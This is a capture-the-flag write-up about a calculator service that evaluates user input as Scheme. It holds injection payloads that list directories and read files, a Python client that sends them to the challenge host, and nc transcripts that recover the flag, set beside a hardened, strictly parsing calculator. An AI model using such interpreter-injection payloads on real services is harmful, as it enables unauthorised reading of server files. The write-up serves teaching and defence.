Play with this amazing calculator: calc.challenges.polictf.it:4000
In this challenge we had to exploit a networked binary blind, in a black-box setting. The binary is a calculator that prompts the user for a first number, an operator, and a second number. If the operation is valid it returns the answer; otherwise it just hangs.
1337 + 1337 = 2674, sure no problem there. However, some odd calculations we tried tipped us off to the true nature of the calculator.
1 1 1 1 1 1 + 1 looks wrong and should fail, but it doesn't. It even yields 7, which is 1 + 1 + 1 + 1 + 1 + 1 + 1: the whole first "number" is spliced into a single addition rather than being parsed as one value. The subtraction operation yields an even weirder answer.
However, it was this operation that really revealed that the interpreter was Scheme.
Sweet: #t and #f are the Scheme values for true and false. So we can expect the user-supplied values to be laid out as (operator first_number second_number), e.g. (+ 1 1), which is exactly why 1 1 1 1 1 1 + 1 became (+ 1 1 1 1 1 1 1). Now that we understand how the input reaches the interpreter, a Scheme interpreter, let's craft our attack payload.
Objectives for our attack payload:
- List files on the disk
- Read from file
Listing files can be done with the (directory-list) function. Reading a file can be done with (read (open-input-file "filename")). Each expression goes in as the "first number" with the operator and second number left empty, so the whole thing the interpreter evaluates is just our function call.
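To make the injection concrete, here is an added example (written for this write-up, not the challenge's own code) that models the assumed server-side composition of the three answers into a Scheme list, shows what the interpreter sees for each payload from the write-up, and puts a hardened calculator beside it that parses the fields strictly and never hands user text to an interpreter. The template (op first second) is an assumption inferred from the observed behaviour; the host, port and prompt strings are taken from the transcript.

```python
"""Model of the polictf calculator injection, plus a hardened version.

Added example, not the challenge's source.  The server-side template
(op first second) is an assumption inferred from the behaviour in the
write-up: "1 1 1 1 1 1 + 1" evaluating to 7 and "directory-list" on its
own being called as a function.
"""
import re
import socket
from typing import Optional

HOST, PORT = "calc.challenges.polictf.it", 4000

# The three prompts exactly as they appear in the nc transcript.
PROMPTS = (b"Write the first number:", b"Write the operator:", b"Write the second number:")


def build_sexpr(first: str, op: str, second: str) -> str:
    """Assumed vulnerable composition: the raw answers are pasted into a
    Scheme list, so an answer containing spaces or parentheses changes the
    shape of the expression instead of being treated as a number."""
    parts = [p.strip() for p in (op, first, second) if p.strip()]
    return "(" + " ".join(parts) + ")"


# Payloads from the write-up, expressed through the template.
PAYLOADS = {
    "sanity check": ("1337", "+", "1337"),
    "splice test":  ("1 1 1 1 1 1", "+", "1"),
    "list files":   ("directory-list", "", ""),
    "read flag":    ('read (open-input-file "flag.txt")', "", ""),
}

# --- hardened version: never let user text reach an interpreter -----------

INT_RE = re.compile(r"-?\d+")            # used with fullmatch: digits only
SAFE_OPS = {
    "+": lambda a, b: a + b,
    "-": lambda a, b: a - b,
    "*": lambda a, b: a * b,
    "/": lambda a, b: a // b,            # integer division; zero checked below
}


def safe_calc(first: str, op: str, second: str) -> int:
    """Parse each field strictly and compute in the host language: the
    operator is an allow-listed token and the operands are real integers."""
    if not INT_RE.fullmatch(first.strip()) or not INT_RE.fullmatch(second.strip()):
        raise ValueError("operands must be integers")
    op = op.strip()
    if op not in SAFE_OPS:
        raise ValueError("unsupported operator")
    a, b = int(first), int(second)
    if op == "/" and b == 0:
        raise ValueError("division by zero")
    return SAFE_OPS[op](a, b)


# --- client that drives the real service (only used with --live) ----------

def recv_until(sock: socket.socket, marker: Optional[bytes] = None,
               timeout: float = 5.0) -> bytes:
    """Read until `marker` is seen (or EOF/timeout when marker is None)."""
    sock.settimeout(timeout)
    buf = b""
    try:
        while marker is None or marker not in buf:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    except socket.timeout:
        pass
    return buf


def send_payload(first: str, op: str = "", second: str = "",
                 host: str = HOST, port: int = PORT) -> bytes:
    """Answer the three prompts in order and return whatever comes back."""
    with socket.create_connection((host, port), timeout=5.0) as s:
        for prompt, answer in zip(PROMPTS, (first, op, second)):
            recv_until(s, prompt)
            s.sendall(answer.encode() + b"\n")
        return recv_until(s)             # response, then EOF or timeout


if __name__ == "__main__":
    import sys
    for name, (first, op, second) in PAYLOADS.items():
        print(f"{name:13} -> interpreter sees {build_sexpr(first, op, second)}")
        try:
            print(f"{'':13}    hardened calc: {safe_calc(first, op, second)}")
        except ValueError as e:
            print(f"{'':13}    hardened calc rejects it: {e}")
    if "--live" in sys.argv:             # actually talk to the challenge server
        print(send_payload("directory-list").decode(errors="replace"))
```

Run without arguments to see, offline, the s-expression each payload turns into and that the hardened version rejects every one of the injected ones; `--live` sends the directory-list payload to the service the same way the nc session below does.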
Let’s list the files in the current directory:
$ nc calc.challenges.polictf.it 4000
Write the first number:directory-list
Write the operator:
Write the second number:
(flag.txt challenge)
Great, let’s read flag.txt.
$ nc calc.challenges.polictf.it 4000
Write the first number:read (open-input-file "flag.txt")
Write the operator:
Write the second number:
cb1228e2387cc12ad30fd4243fc23a0